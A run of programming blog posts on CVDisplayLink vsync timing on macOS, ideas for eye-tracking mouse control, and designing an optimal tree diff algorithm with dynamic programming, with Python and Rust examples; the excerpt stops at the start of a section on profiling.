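        finished = fired + render_times_us[i % len(render_times_us)]
        frame = finished // FRAME_US  # vsync interval the finished draw lands in
        if frame < num_frames:
            counts[frame] += 1
    return counts

# Lucky phase: every draw finishes well inside its own frame.
print(paints_per_frame(1_000, [4_000, 8_000], 6))   # [1, 1, 1, 1, 1, 1]
# Unlucky phase: the slower draws spill past the vsync.
print(paints_per_frame(10_000, [4_000, 8_000], 6))  # [1, 0, 2, 0, 2, 0]
```

In both runs the draw callback fires exactly every 16.6ms, so an FPS counter would report 60fps either way. Only the second run alternates between frames with no new image and frames with two.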

Also, if you’re using this for a game loop where you only process input at the start of every frame, you could have close to an entire extra frame of latency if you’re unlucky at startup.

“But it’s a special thing that has ‘display’ and ‘link’ right in the name, surely it must link up to the display vsync events!” you might say. That’s what I thought too until I talked to @pcwalton at a Rust meetup and he said he’d disassembled CVDisplayLink and found it was just a timer. This was astonishing to me and I sat on this information somewhat skeptical for a while. But, today I finally got around to doing a bunch of investigation and found that he’s right and CVDisplayLink does not link to the vsync.

First, I disassembled the CoreVideo framework where CVDisplayLink resides and found a bunch of code that fetches the display rate, calculates how often the timer should be triggered and waits on a timer. I didn’t find any code that looked for vsync events.

Next, I did some experiments, because I might have missed some hidden synchronization. I used Kris Yu’s Water Metal sample app since that’s sadly the only macOS Metal sample code I could find that built for me. I then disassembled MTKView and confirmed that, as I suspected, it just uses CVDisplayLink to call your draw method. Then I added kdebug_signpost calls in the draw method so that I could use the Instruments “Points of Interest” trace combined with the new display vsync information to see how they line up.

What I found is that as one would expect with a timer, within each run the draw call happens at a consistent time within the frame, but between different runs the draw call happens at completely different times depending on the phase the CVDisplayLink starts up in relation to the display vsync.

Here’s some screenshots of different runs in Instruments. The red boxes on the bottom are the draw call, and the vsync display intervals are clearly visible as lining up very differently each run:

Now, the real question is, what do you do if you want actual vsync alignment? I actually don’t know, I haven’t done enough research yet, but I have some ideas that may or may not work:

I think Cocoa animation or Core Animation draw callbacks may actually be linked to display vsync, in which case you can use those. I’m not sure though.
OpenGL vsync might synchronize with the real vsync.
Somehow Instruments gets at the real vsync times, they might come from a private API, but it also might be something public.
There may be some other API I don’t know about.

Note that I haven’t tested CADisplayLink on iOS, but I’ve heard it works properly. Anyway, if you know anything about this issue or how to do things properly, email me at tristan@thume.ca! I may update this post if I learn anything new.

Edit 2017/12/10: I was wrong, sorry

@ametis_ on Twitter noted that the internal CVCGDisplayLink::getDisplayTimes method actually accesses a pointer to a StdFBShmem_t. I poked around some more and confirmed that the shared memory for this is indeed mapped in by the initializer. I figured I might miss something like this, which is why I did the experiments. This shared memory contains real vsync times, and is apparently a way to get real vsync information from the kernel. See this StackOverflow post for an example of code that maps it in. The question is, why do my experiments show that it still doesn’t line up with vsync?

The MTKView I was testing with uses CVDisplayLinkCreateWithActiveCGDisplays, which if you have multiple displays creates a CVDisplayLink “capable of being used with all active displays”, i.e. it doesn’t use vsync. I was using an external monitor for my tests. There’s nothing on my laptop display, but I leave it open because there’s a hardware issue where it messes with my trackpad if I close it. A smarter CVDisplayLink could handle this case fine by realizing that only one of my displays was updating at the time, but it turns out it falls back to a timer.

I re-did my experiments in Instruments on my laptop display and found that it consistently fired the draw call half-way into the frame, about 7ms from the next vsync. I don’t know why it does it in the middle rather than the start, but at least it was consistent across 6 runs.

So, basically this article is mostly wrong, provided you only have one display. You still have to worry about jank due to inconsistent frame times on a single monitor if you don’t have GL/Metal vsync enabled and your frames jitter around 7ms though. And if you want events near the start of vsync you may still have a difficult task ahead of you.

It’s probably even possible to get the correct events in a multi-monitor case, but you need some fancy code that watches which screen your window is on, and constructs a new CVDisplayLink with just that CGDisplay when the window moves.

Interestingly, @ametis_’s account was created just for that tweet, and figuring out that it uses StdFBShmem_t without a hint would have required way way better reversing skills than mine to trace the instance variable back to the init method through a bunch of offsets to a memory mapping of an opaque code, which they would have had to figure out is kIOFBSharedConnectType and look at that struct to find it contains the vblTime field. Either they’re really good at reverse engineering, or they’re an Apple engineer with access to the source code who looked into it after seeing my article. Regardless I’m happy they set me straight!

Other commenters on Hacker News and Twitter have pointed out a few things that I should add here:

Someone on HN notes that the Apple docs don’t promise that CVDisplayLink gives you refresh times. I had noticed this and treated it as further evidence for my results, but didn’t include it in my article. Oops, turns out it does sometimes, just not always.
@jordwalke linked me to this article that explains how CADisplayLink works on iOS.

Eye Tracking Mouse Control Ideas

2017-11-10T00:00:00+00:00

This is a list of ideas for using eye tracking as a mouse replacement, specifically solving the problem that eye tracking often isn’t quite accurate enough to use raw. There’s lots of targets on a normal computer that are just too small for even the best fingertip-size eyetracker accuracies, like selecting individual characters, or small buttons. For some people, like me, eye trackers tend just not to work too well and only are accurate within maybe a 4 cm diameter, much too large to specify most targets.

There’s also reason to suspect that this situation won’t improve. People have been working on eye tracking for years and accuracy is still bad. A few papers I’ve read have said that the muscles that point the eyes may not even be accurate enough to point as precisely as a mouse, and that even if they are, fixating gaze precisely leads to eye fatigue quite quickly.

Why would you want to replace the mouse with an eye-tracking based solution?

Disabilities
Repetitive Stress Injuries: There’s lots of approaches to addressing RSIs, but it’s also a much larger market.
People who don’t want to take their hands off the keyboard: Programmers go to crazy lengths to learn shortcuts to avoid reaching for the mouse, so if there were a fast system of hands-free mousing, some might like it.

I’m writing this list for two reasons:

So that I can get the WaybackMachine to archive it to have evidence of prior art in case anybody tries to patent these. I try to explore as much of the space of possible ideas people could try patenting as possible. Of course, it’s possible one or more of these already falls under some patent, because there’s patents on a lot of obvious ideas, but I don’t know of any.
As a survey of the possibilities, to look at what’s possible and possibly inspire someone to try something out. Eye tracking has such potential, but is sadly rarely used outside of research.

Before proceeding I’d like to emphasize that not all these ideas are good, many wouldn’t be that nice to use or would have other issues, I aimed much more for breadth in creating this list than depth.

There’s three broad categories to these ideas:

Combining with another input method

There’s a lot of alternative mousing methods that work but are quite slow. But, if you use eye tracking for coarse but fast narrowing of position, and then another technique for refinement, they can be quite efficient.

Polymouse: Using head tracking for refinement and eye tracking for large movements, you can achieve speeds equal to a good trackpad and approaching a normal mouse. This is the main technique I’ve put effort into and was the focus of my research at the Waterloo HCI lab. I use a version of the “Animated MAGIC” technique to quickly move the mouse cursor along the path to the target based on eye tracking. I’m currently working towards making this technique available in a low-cost and convenient system for daily use.
Combining with a mouse: This just allows you to use less mouse movement. This is built into Tobii’s consumer software.
Combining with voice: There’s a lot of things on a screen to click, and it’s hard to describe them, but given a small region from eye tracking, you can use OCR or accessibility APIs to find interactible things near the gaze and disambiguate what to do via voice. For example “click find” when looking near the “Find file” button on Github.
Combining with a keyboard: Within a region around the eye, you could offer a number of options for things to interact with, presented as letters or colours overlayed on the screen, and then use different keyboard keys to select which one was the true target. The places to put the markers could be done via a pattern, machine learning, text recognition or an accessibility API. Similar to this.
Combining with button timing: When the click button is pressed, instead of emitting a click event it could start moving the cursor in, for example, a grid or spiral pattern around the gaze location, and when the user releases the button it clicks at the cursor’s current location. This could also be combined with likely target data, see the next section. This would be slow but doesn’t require extra hardware, since it uses timing information as the additional source.
Face Gestures: Camera data could be fed into a face tracking algorithm and face gestures could be used to refine the cursor position. For example moving the lips around like a joystick, or twitching cheeks to nudge left and right. Most eye trackers are actually just IR cameras so this may not even require a separate camera.

Predicting the target

When you have eye tracking data that is fairly good but not perfect, the effective accuracy can be improved by guessing good targets within the gaze region.

Good targets can be things like buttons, words to select, and other UI controls. Even when some place is interactible, it may make sense to choose a better target anyway, for example preferring selecting entire words rather than characters within a word, and the right side of a tab targeting the close button and the left side targeting clicking the tab.

Given a source of information about likely targets, there’s various things you can do with the information:

Snapping: The gaze cursor or clicks snap to the nearest likely target. Possibly with snappiness determined by a measure of likelihood of clicking the target.
Draw the cursor towards it: This is basically a softer form of snapping. It could be like gravity, or fancier. For example modelling the gaze data as a probability distribution over true targets, and target information as a prior distribution, and then using Bayesian calculations to find the maximum likelihood target. I think I prefer the simpler and more consistent idea of snapping though.
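As one possible reading of the Bayesian idea, the sketch below treats the gaze sample as the true target position plus isotropic Gaussian noise and combines that likelihood with a per-target prior. The function name, the tuple layout and the choice of a Gaussian error model are assumptions for illustration; nothing here comes from an existing eye tracking API.

```python
import math

def most_probable_target(gaze, targets, sigma):
    """Pick the target maximizing prior * Gaussian likelihood of the gaze sample.

    gaze: (x, y) reported by the tracker.
    targets: list of (name, (x, y), prior), where prior is any non-negative weight.
    sigma: assumed standard deviation of tracker error, in the same units as positions.
    """
    def log_posterior(target):
        _, (tx, ty), prior = target
        if prior <= 0:
            return -math.inf
        dist_sq = (gaze[0] - tx) ** 2 + (gaze[1] - ty) ** 2
        # Log of an isotropic Gaussian likelihood (constant terms dropped) plus log prior.
        return -dist_sq / (2 * sigma ** 2) + math.log(prior)

    return max(targets, key=log_posterior)[0]
```

With equal priors this reduces to snapping to the nearest target. With a large `sigma` (an inaccurate tracker) the prior dominates, so a frequently clicked target can win over a slightly closer but rarely clicked one.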

There’s a few ways I can think of getting the target information, a system could use either one or many of these:

Use accessibility APIs: Accessibility APIs can tell you the pixel location of buttons, text and other likely targets.
Likelihood Neural Net: Use machine learning (probably a CNN) to train a model that given a screenshot, predicts a likelihood distribution (think heatmap) of click targets. It could be trained on data from recording a screenshot and the mouse position on every click during normal computer use.
Prediction Neural Net: Similar to the above, but using Gaze data. A model would be trained on the gaze location and screen contents to predict the true mouse click target. One way to do this would be to feed the net patches of the screen centered on the gaze target. Training data would be gathered by saving data from every click and training on the true click position.
Classical Computer Vision: There’s a number of possible computer vision techniques that could be used to identify targets without machine learning. For text anything from full OCR to algorithms that detect where text is without recognizing it (like in my KeySelect demo). Buttons also often have text, but controls could also be recognized using image patches recognized from previous clicks. You could even use heuristics like “coloured things” or “visually complex things”.

Disambiguate with just gaze

It’s also possible to disambiguate targets with gaze alone, but this generally requires modifying the screen or overlaying markers on it to guide the gaze.

Magnifying: The simplest one is just magnifying the error around the gaze, either continuously or on dwell. This allows the user to refine their gaze on larger targets. The magnification can be either a rectangle or something fancier like a fisheye.
Moving Markers: Similar to keyboard disambiguation, overlay likely targets with a marker that moves around in some pattern. Check if the gaze data is following one of the patterns. This works because eye trackers are better at detecting direction and timing of motion than absolute position. See the Orbits paper for an example of this kind of system.
Moving Distortion: Similar to the previous except instead of markers, distort the screen area around the gaze in a moving pattern where different parts move in different patterns. Then the user just follows what they want to click with their gaze.
Eye Gestures: Extra eye movements could be used to refine the position. For example darting the eyes in a direction could nudge the cursor in that direction relative to where it was before the dart. Or winking an eye could move it left or right a small amount.
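One way to check whether the gaze is following one of the moving markers is to correlate the gaze samples with each marker's trajectory, which ignores any constant offset in the tracker's absolute position. The sketch below is an illustration of that idea under assumed names and an assumed threshold of 0.8, not an implementation of any particular paper's method.

```python
import math

def pearson(a, b):
    """Pearson correlation of two equal-length sequences (0.0 if either is constant)."""
    n = len(a)
    mean_a, mean_b = sum(a) / n, sum(b) / n
    cov = sum((x - mean_a) * (y - mean_b) for x, y in zip(a, b))
    var_a = sum((x - mean_a) ** 2 for x in a)
    var_b = sum((y - mean_b) ** 2 for y in b)
    if var_a == 0 or var_b == 0:
        return 0.0
    return cov / math.sqrt(var_a * var_b)

def followed_marker(gaze_path, marker_paths, threshold=0.8):
    """Return the name of the marker whose motion best matches the gaze, or None.

    gaze_path: list of (x, y) samples.
    marker_paths: dict of name -> list of (x, y), sampled at the same instants.
    """
    gx = [p[0] for p in gaze_path]
    gy = [p[1] for p in gaze_path]
    best_name, best_score = None, threshold
    for name, path in marker_paths.items():
        # Score by the weaker axis so both x and y motion must match.
        score = min(pearson(gx, [p[0] for p in path]),
                    pearson(gy, [p[1] for p in path]))
        if score > best_score:
            best_name, best_score = name, score
    return best_name
```

Two markers orbiting in opposite directions share their x motion but have opposite y motion, so scoring by the weaker axis separates them even when the gaze data is shifted well away from both.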

How to click

Clicking is a separate issue, but there’s also lots of possibilities here:

Using a button: This could be a normal mouse or any other button.
A foot pedal
Dwell clicking
Mouth noises: This is what I tried in my research, see PopClick
Face, head or eye gestures
Voice recognition
A keyboard

Conclusion

Like I said, this was originally written primarily as prior art for patents. But I hope it was at least somewhat interesting to think about the numerous possibilities for eye tracking as a mouse replacement, even if a lot of the ideas have issues.

Designing a Tree Diff Algorithm Using Dynamic Programming and A*

2017-06-17T00:00:00+00:00

During my internship at Jane Street¹, one of my projects was a config editing tool that at first sounded straightforward but culminated in me designing a custom tree diffing algorithm using dynamic programming, relentlessly optimizing it and then transforming it into an A* accelerated path finding algorithm. This post is the story of the design and optimization of the algorithm, of interest to anyone who needs an algorithm for diffing trees, or who just wants an in-depth example of the process of solving a real-world problem with a custom non-trivial dynamic programming algorithm, and some tips on optimizing one while maintaining understandability, or anyone who just wants to read a cool programming story and maybe learn something.

Background: Description of the problem I was solving.
The Heuristic Approach: My initial attempt at a simple algorithm, and why it was insufficient.
A Tree Diff Optimizer: Rethinking the problem as finding the optimal resulting tree diff.
Dynamic Programming: Background on using the correspondence between memoizing recursion and path finding on a grid to find solutions to problems like Levenshtein distance.
The Algorithm: Extending Levenshtein distance with two grids and recursion.
Profiling and Optimizing: Relentless profiling and optimizations to reduce run time.
Path Finding: Using A* to make the run time proportional to the difference rather than tree size.
Example Implementation: Analysis of the effectiveness and costs of A* on Levenshtein distance, sequence alignment and diffing problems, with open source example code.

Background

Jane Street has a lot of config files for their trade handling systems which use S-expressions (basically a tree with strings as leaves). They often want to make changes that will only apply on certain days, for example days when markets will act differently than normal like elections and option expiry dates. To do this their config processor knows a special construct that is like a switch statement for dates. It looks something like this:

(thing-processor-config
  (:date-switch
   (case 2017-04-07
    (speed 5)
    (power 7))
   (else
    (speed 3)
    (power 9))))

The semantics are that any :date-switch block has its branches checked against the current date and the children of the correct branch are used in place of the :date-switch in the config structure. Note that each branch can contain multiple sub-trees.
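To illustrate these semantics, here is a small sketch that models S-expressions as nested Python lists of strings and splices the matching branch into its parent. The representation and the `resolve` function are assumptions for illustration only; the real config processor and its syntax are more complicated than this.

```python
def resolve(node, today):
    """Return the list of nodes that replace `node` once date switches are evaluated."""
    if isinstance(node, str):
        return [node]
    if node and node[0] == ":date-switch":
        for branch in node[1:]:
            matches = (branch[0] == "else" or
                       (branch[0] == "case" and branch[1] == today))
            if matches:
                body = branch[1:] if branch[0] == "else" else branch[2:]
                # A branch may hold several sub-trees; all are spliced into the parent.
                return [out for child in body for out in resolve(child, today)]
        return []
    return [[out for child in node for out in resolve(child, today)]]

config = ["thing-processor-config",
          [":date-switch",
           ["case", "2017-04-07", ["speed", "5"], ["power", "7"]],
           ["else", ["speed", "3"], ["power", "9"]]]]

print(resolve(config, "2017-04-07"))
# [['thing-processor-config', ['speed', '5'], ['power', '7']]]
```

Returning a list of replacement nodes rather than a single node is what lets one branch contribute multiple sub-trees, or none at all, to its parent.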

Now, just that small example took a while for me to type and get the indentation correct. People at Jane Street are frequently making edits where they just want to quickly change some numbers but have to make sure they get the syntax and indentation right and have everything still look nice. This is begging for automation!

So they asked me to write a tool that would allow people to just edit the file and run a command, and it would automatically scope their changes to the current day, or a date they specify, by detecting the differences between the current contents on disk and the committed contents in version control.

When I first heard the problem, it sounded pretty easy and I thought I’d be done within a few days, but I discovered a number of catches after starting and it ended up taking 5 weeks. This sounds like we maybe should have abandoned it when we discovered how complex it was, but given how much time expensive people were spending doing these edits, sometimes under time pressure when every extra minute had a high cost, it was worth it to get it right.

The first thing I discovered is that they had a library for parsing and serializing s-expressions while preserving indentation and comments, but it didn’t cleanly handle making structural modifications to the parse tree. Before even starting the rest of the project I had to write a library that provided a better data model for doing this and having the result be nicely indented.

Next, the real syntax for these date switch blocks is more complicated than my description and has a static constraint where the branches must cover every date in the current context and no more, including when nested inside other switches. I also didn’t want edits to :date-switch blocks to themselves be scoped to a date, since that would create invalid syntax. This required I parse my earlier style-preserving representation into one that computed date context and represented :date-switch blocks specially in an Abstract Syntax Tree (AST) as well as transform back from my representation to the one I could output.

Now finally I was ready to start on the actual algorithm. The basic task my script had to do was take two trees and wrap differing sub-trees in a :date-switch block with the old contents in one branch and the new contents in the other branch. The thing is, there are many ways to do this. The switch can be placed at many different levels and there may be multiple edits and it’s not specified how to group them. Technically it could just add a :date-switch at the top level with the old file in one branch and the new file in another, but that wouldn’t be very satisfying, just like how technically the diff command could just output the entire old file prefixed with - and then the new file prefixed with +, but then nobody would use it. I needed an algorithm that gave reasonable-looking and compact changes for real-world edits. It shouldn’t double the file size in an enormous :date-switch when only a single number changed.

The Heuristic Approach

If you just want to read about the optimal algorithm and not why one was necessary you can skip this section.

First, I came up with a simple algorithm that I thought would work in almost all real-world cases. I simply recursively walked down the tree until I got to either a leaf that was different or a node that had a different number of children, and then it would put a :date-switch at that level.
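A minimal sketch of that first heuristic, again modelling trees as nested Python lists of strings. The original tool was not written in Python and worked on a richer AST, so the function name and representation here are purely illustrative.

```python
def scope_change(old, new, date):
    """Wrap the first differing level of two trees in a :date-switch."""
    if old == new:
        return old
    both_lists = isinstance(old, list) and isinstance(new, list)
    if both_lists and len(old) == len(new):
        # Same shape at this level: keep walking down into the children.
        return [scope_change(o, n, date) for o, n in zip(old, new)]
    # A differing leaf, or a node whose number of children changed.
    return [":date-switch", ["case", date, new], ["else", old]]

old = ["cfg", ["speed", "3"], ["power", "9"]]
new = ["cfg", ["speed", "5"], ["power", "9"]]
print(scope_change(old, new, "2017-04-07"))
# ['cfg', ['speed', [':date-switch', ['case', '2017-04-07', '5'], ['else', '3']]], ['power', '9']]
```

For a changed leaf the switch lands right at the leaf. When a list gains or loses a child, the whole list ends up duplicated in both branches.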

This didn’t produce the most satisfying results. It was okay for changes to leaves, but as soon as you added or removed a child from a list, it would duplicate most of the list when it could have taken advantage of the ability to have a different number of children in each branch.

It produced this:

(:date-switch
 (case 2017-04-07
  (foo
   qux
   ; ... 1000 more lines ...
   baz))
 (else
  (foo
   ; ... 1000 more lines ...
   baz)))

When we really would have preferred:

(foo
 (:date-switch
  (case 2017-04-07 qux)
  (else))
 ; ... 1000 more lines ...
 baz)

Luckily, this was easy enough to solve since Jane Street already had an OCaml library implementing the Patience Diff algorithm for arbitrary lists of comparable OCaml types. When I had two lists of differing length, I simply applied the Patience Diff algorithm and placed :date-switch blocks based on the diff.

This algorithm worked okay for cases of a single edit, but we wanted the tool to work with multiple edits, and for those it still often produced terrible results.

For example, because it stopped recursing and applied a diff as soon as it reached a list of changing length, it would do this:

(this
 (:date-switch
  (case 2017-04-07
   (bar
    ; ... 1000 more lines ...
    baz))
  (else
   (foo
    ; ... 1000 more lines ...
    baz)))
 tests
 (:date-switch
  (case 2017-04-07 adding to a list and modifying a sub-tree)
  (else)))

It duplicates the long sub-tree instead of placing the :date-switch lower down in it, just because we made another edit at a higher level of the tree.

There were a number of other cases where it didn’t produce output as nice as a human would, but earlier on my mentor and I had sighed and accepted it. This though was the last straw, we needed a new approach…

A Tree Diff Optimizer

At this point I was fed up with constantly discovering failure modes of algorithms I thought should work on real-world cases, so I decided to design an algorithm that found the optimal solution.

I started by searching the Internet for tree diff algorithms, but every algorithm I found was either a different kind of diff than what I needed, or was complex enough that I wasn’t willing to spend the time understanding it (probably only to later find out it computed a different kind of diff than I needed).

Specifically, what I needed was mostly like a tree diff, but I wasn’t optimizing for the same thing as other algorithms. What I wanted to optimize for was resulting file size, including indentation. I thought this represented what I wanted fairly well, and captured why previous results which duplicated large parts of the file were bad. As well as the character cost of the branches, each additional :date-switch block added more characters. Additionally, each switch construct could also contain multiple sub-trees in each branch, which I needed to model to account for overhead correctly.

Consider the case of (a b c) becoming (A b C). A human would write:

(:date-switch
 (case 2017-04-07 (A b C))
 (else (a b c)))

Despite the fact that the b is duplicated, this is the smallest number of characters. However if we had something longer we’d want something different, so the optimal result even depends on the length of leaf nodes:

((:date-switch (case 2017-04-07 A) (else a))
 this_is_a_super_long_identifier_we_do_not_want_duplicated_because_it_is_looong
 (:date-switch (case 2017-04-07 C) (else c)))
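To make the trade-off concrete, here’s a small Rust sketch that measures both layouts for a three-element list whose first and last items change. It’s a simplification that counts characters on a single line and ignores indentation and newlines, and the function names are made up for this example.

```rust
/// Characters needed when one switch wraps the whole list `(first mid last)`,
/// so `mid` appears in both branches.
fn one_switch_len(old: (&str, &str), new: (&str, &str), mid: &str) -> usize {
    format!(
        "(:date-switch (case 2017-04-07 ({} {} {})) (else ({} {} {})))",
        new.0, mid, new.1, old.0, mid, old.1
    )
    .len()
}

/// Characters needed when each changed leaf gets its own switch and `mid`
/// appears only once.
fn two_switches_len(old: (&str, &str), new: (&str, &str), mid: &str) -> usize {
    let switch = |n: &str, o: &str| format!("(:date-switch (case 2017-04-07 {}) (else {}))", n, o);
    format!("({} {} {})", switch(new.0, old.0), mid, switch(new.1, old.1)).len()
}
```

Under this single-line model the (a b c) case costs 55 characters with one switch versus 91 with two, and the two-switch layout only wins once the shared middle item is longer than 37 characters, as the long identifier above is.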

A very common real-world example of why it is important for it to be able to batch together differences is when changing multiple values of a data structure. The config files often have lots of key-value pairs and edits often touch many nearby values:

(thing-processor-config
  (:date-switch
   (case 2017-04-07
    (speed 5)
    (size 80)
    (power 9001))
   (else
    (speed 3)
    (size 80)
    (power 7))))

Even though size didn’t change, we duplicate it because it’s cleaner than having two :date-switch blocks.

Dynamic Programming

After 2+ days of research, discussing ideas with my mentor, and sitting down in a chair staring out at the nice view of London while thinking and sketching out cases of the algorithm in a notebook, I had something. It was a recursive dynamic programming algorithm that checked every possible way of placing the :date-switch blocks and chose the best, but used memoization (that’s the dynamic programming part) so that it re-used sub-problems and had polynomial instead of exponential complexity.

The core of the tree diffing problem is similar to the Levenshtein Distance problem: you have two lists that have some number of insertions and deletions between them, and you want to find the best way to match them up. You can do this by considering a number of different cases, each with a different cost, based on the first elements of the lists. Calculating each cost involves some constant plus recursively computing the cost for the rest of the lists. Then you compute the cost for each possible decision and take the minimum one.

For example if you have a function best_cost(old,new) to solve the Levenshtein distance problem, there are three cases for the start of the lists: insert, delete and same. The simplest case is when the first elements of the two lists are the same: matching characters cost 0, so the cost is just best_cost(old[1..], new[1..]). If a delete costs 1, then if the start of the list is a delete that means the character is in old but not new so the total cost is 1 + best_cost(old[1..], new). Insert is similar but the opposite direction. This recursion terminates with the base case of best_cost([],[]) = 0. The problem is that this leads to an exponential number of recursive calls.
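A minimal Rust sketch of that recursion, assuming insert and delete each cost 1 and a match costs 0. The best_cost name comes from the description above; the slice-based signature is an assumption. It’s deliberately naive, so it makes exponentially many calls on longer inputs.

```rust
/// Naive recursive insert/delete edit distance between two slices.
/// A match costs 0; an insert or a delete costs 1.
fn best_cost(old: &[char], new: &[char]) -> usize {
    match (old.first(), new.first()) {
        // Base case: both lists are exhausted.
        (None, None) => 0,
        // Only inserts remain.
        (None, Some(_)) => 1 + best_cost(old, &new[1..]),
        // Only deletes remain.
        (Some(_), None) => 1 + best_cost(&old[1..], new),
        (Some(a), Some(b)) => {
            let delete = 1 + best_cost(&old[1..], new);
            let insert = 1 + best_cost(old, &new[1..]);
            let mut best = delete.min(insert);
            if a == b {
                // "Same" move: consume one element from each list for free.
                best = best.min(best_cost(&old[1..], &new[1..]));
            }
            best
        }
    }
}
```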

But we can fix this by noticing that a lot of things are being computed redundantly and sharing the results by “memoizing” the function so that it stores the results for arguments it has been called with before. As seen in the diagram below, where the numbers on the nodes represent calls to best_cost(old[i..], new[j..]) as i,j:

But in some cases it can be difficult to think about the problem as a recursive memoized decision tree. Luckily there’s a different way of thinking about it that lends itself very well to sketching out algorithms in a notebook or on a whiteboard. We can rotate the tree 45 degrees and notice that we can think about it as a grid:

This is useful for memoization since it means we can store our results in an efficient-to-access 2D array, but also because we can now think of our problem as finding a path from the top left of a grid to the bottom right using a certain set of moves. Whenever our decisions are constrained we can annotate the grid where the input lists have a property, like two items being the same. In the example below, we have a diagram of trying to find the Levenshtein distance from “abcd” to “bcad”, with the best path bolded, and an alternative more costly path our algorithm might explore shown dashed.

We can find the best path by testing all the paths and returning the best one. There are exponentially many paths, but we can notice that the best path from a point in the middle of the grid to the bottom right is always the same no matter what moves might have gotten us to that point.

One way to exploit this is to recursively search all paths from the top left, memoizing the best path at each point so we don’t compute it again. This corresponds to the memoizing of recursive functions mentioned earlier and is called the “top-down approach” to dynamic programming.
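As a sketch of the top-down approach in Rust, here’s the same insert/delete recursion with a memo table keyed by suffix start indices. The function name and the choice of a HashMap for the table are assumptions for illustration; a 2D array would work just as well.

```rust
use std::collections::HashMap;

/// Top-down dynamic programming: each (i, j) pair of suffix starts is solved
/// once and cached. Costs: same = 0, insert = delete = 1.
fn best_cost_memo(
    old: &[char],
    new: &[char],
    i: usize,
    j: usize,
    memo: &mut HashMap<(usize, usize), usize>,
) -> usize {
    if let Some(&cost) = memo.get(&(i, j)) {
        return cost;
    }
    let cost = if i == old.len() {
        new.len() - j // only inserts remain
    } else if j == new.len() {
        old.len() - i // only deletes remain
    } else {
        let delete = 1 + best_cost_memo(old, new, i + 1, j, memo);
        let insert = 1 + best_cost_memo(old, new, i, j + 1, memo);
        let mut best = delete.min(insert);
        if old[i] == new[j] {
            best = best.min(best_cost_memo(old, new, i + 1, j + 1, memo));
        }
        best
    };
    memo.insert((i, j), cost);
    cost
}
```

The memo table never holds more than (old.len() + 1) * (new.len() + 1) entries, which is where the polynomial bound comes from.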

There’s also the “bottom-up” approach where you start from the bottom right and fill in each intersection with the best path based on previously computed results or base cases, using an order where everything you need is always available. In this case it would be right to left, bottom to top, like reading a book from end to start.
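A bottom-up version of the same insert/delete distance might look like this in Rust. The function name is hypothetical, and the table stores the best cost from each grid point to the bottom-right corner.

```rust
/// Bottom-up dynamic programming over the grid. table[i][j] holds the best
/// cost from grid point (i, j) to the bottom-right corner.
fn best_cost_bottom_up(old: &[char], new: &[char]) -> usize {
    let (n, m) = (old.len(), new.len());
    let mut table = vec![vec![0usize; m + 1]; n + 1];
    // Visit rows bottom to top and columns right to left, so the cells
    // below, to the right, and diagonally below-right are already filled.
    for i in (0..=n).rev() {
        for j in (0..=m).rev() {
            if i == n && j == m {
                continue; // base case: the corner already holds 0
            }
            let mut best = usize::MAX;
            if i < n {
                best = best.min(1 + table[i + 1][j]); // delete
            }
            if j < m {
                best = best.min(1 + table[i][j + 1]); // insert
            }
            if i < n && j < m && old[i] == new[j] {
                best = best.min(table[i + 1][j + 1]); // same
            }
            table[i][j] = best;
        }
    }
    table[0][0]
}
```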

Now we know that if we can restate our tree diffing problem as a problem of path-finding on a graph, we can turn that into an implementation using dynamic programming.

The Algorithm

The key differences between my problem and Levenshtein distances were the fact that it was a tree and not a list, and the fact that consecutive sequences of inserts/deletes were cheaper than separate ones (because consecutive edits could be combined in one :date-switch block). My cost function is also different in that I’m measuring the size of the resulting tree including :date-switch blocks, so my moves will need costs based on that.

I can extend the list algorithm to trees by adding a move I’ll call “recurse” that goes down and right and can be done on any square where both items are sub-trees (not leaves). The cost of the move is the cost of the resulting diff from running the entire tree-diff algorithm recursively on those two sub-trees. I don’t bother recursing if the two sub-trees are the same, since the “same” move has identical cost in that case, and is faster to compute.

We can handle the cheaper consecutive inserts and deletes by modeling entering and leaving a :date-switch block as moves. However now we have different move sets based on if we are in or out of a :date-switch block and different costs to get to the end from a given point. We can rectify this by splitting our problem into path-finding over two grids of the same size. One is our “outside” grid, where we can do the “same”, “recurse” and now also an “in” move which moves us to the same position on the other grid.

On the “inside” grid we can do “insert”, “delete” and “out” moves. But that won’t quite work because if “in” and “out” both don’t make forward progress, the graph has a cycle and our search algorithm will endlessly recurse over paths going “in” and “out” at the same point. We can solve this by splitting “out” into “insert out” and “delete out”. These two are the same as insert and delete except they also move to the “outside” grid. We also have to make sure that we don’t use the plain “insert” and “delete” moves to go to the bottom right of the “inside” grid, because then we’d be stuck.

This gives us a set of moves that always make forward progress and share as much as possible. With this we can find the best path, and that gives us an optimal diff. See the diagram below which also includes the cost of each move and an example path, although not necessarily the optimal one:

Even this model is simplified, because in reality I had to handle input lists that both might have :date-switch blocks already in them, so there were a bunch more cases and contingencies for handling existing :date-switch blocks properly. But those aren’t very interesting and the core of the algorithm is the same.

So I implemented this algorithm on top of the AST manipulation framework I’d built by translating it to a memoized recursive algorithm operating on linked lists. Since the outer algorithm also involved recursion, this meant I had two kinds of recursion, which I structured using OCaml’s ability to define functions inside of other functions. I had an outer scope_diffs function that took two lists of s-expressions and produced a list of s-expressions with differences scoped by :date-switch blocks. Inside it, I allocated two tables to memoize the results in, and defined scope_suffix_diffs_inside and scope_suffix_diffs_outside functions that took indices of the start of the suffixes and mutually recursed and memoized into the tables based on the moves above.

Unlike the Levenshtein distance algorithm, I wanted more than just the cost, so I stored the actual scoped s-expressions up to each point in the table directly. Because I was using immutable linked lists in OCaml this was memory-efficient, since each entry would share structure with the entries it was built from. This way I avoided the back-tracing path reconstruction step that is frequently used with dynamic programming. In order to make the lists share structure I did have to add to the front instead of the back, but I just reversed the best resulting list before I returned it.

Once I finished programming it and got it to compile, I think I only had to fix one place where I’d copy-pasted a +1 where I shouldn’t have and then it worked beautifully. Finally, unlike all my heuristic attempts, I couldn’t find a case where this produced a result significantly worse than what a human would do.

Side note: I used to expect lots of debugging time whenever I finished a bunch of complex algorithmic code, but to my surprise I’ve found that’s rarely the case when using languages with good type systems. The compiler catches almost all small implementation errors, and since I’ve usually spent a long time thinking about all the edge cases carefully while designing the algorithm, there’s usually no serious bugs left by the time it compiles. My tests usually fail a few times, but that’s normally because I wrote the tests wrong.

Unfortunately, while my new algorithm worked quite well for small files, it was very slow on large files. My mentor timed it on a few example files and fit a polynomial and discovered that it was empirically O(n^3) (or it might have been O(n^4), I forget) in the file size. This was unfortunate since some of the files were tens of thousands of lines long. I had to make it faster. Luckily, while I’d been thinking about and implementing the algorithm I’d accumulated quite a list of optimization ideas to try. But first, I decided to profile to see what the biggest costs were.

Profiling and Optimizing

Incremental cost computation

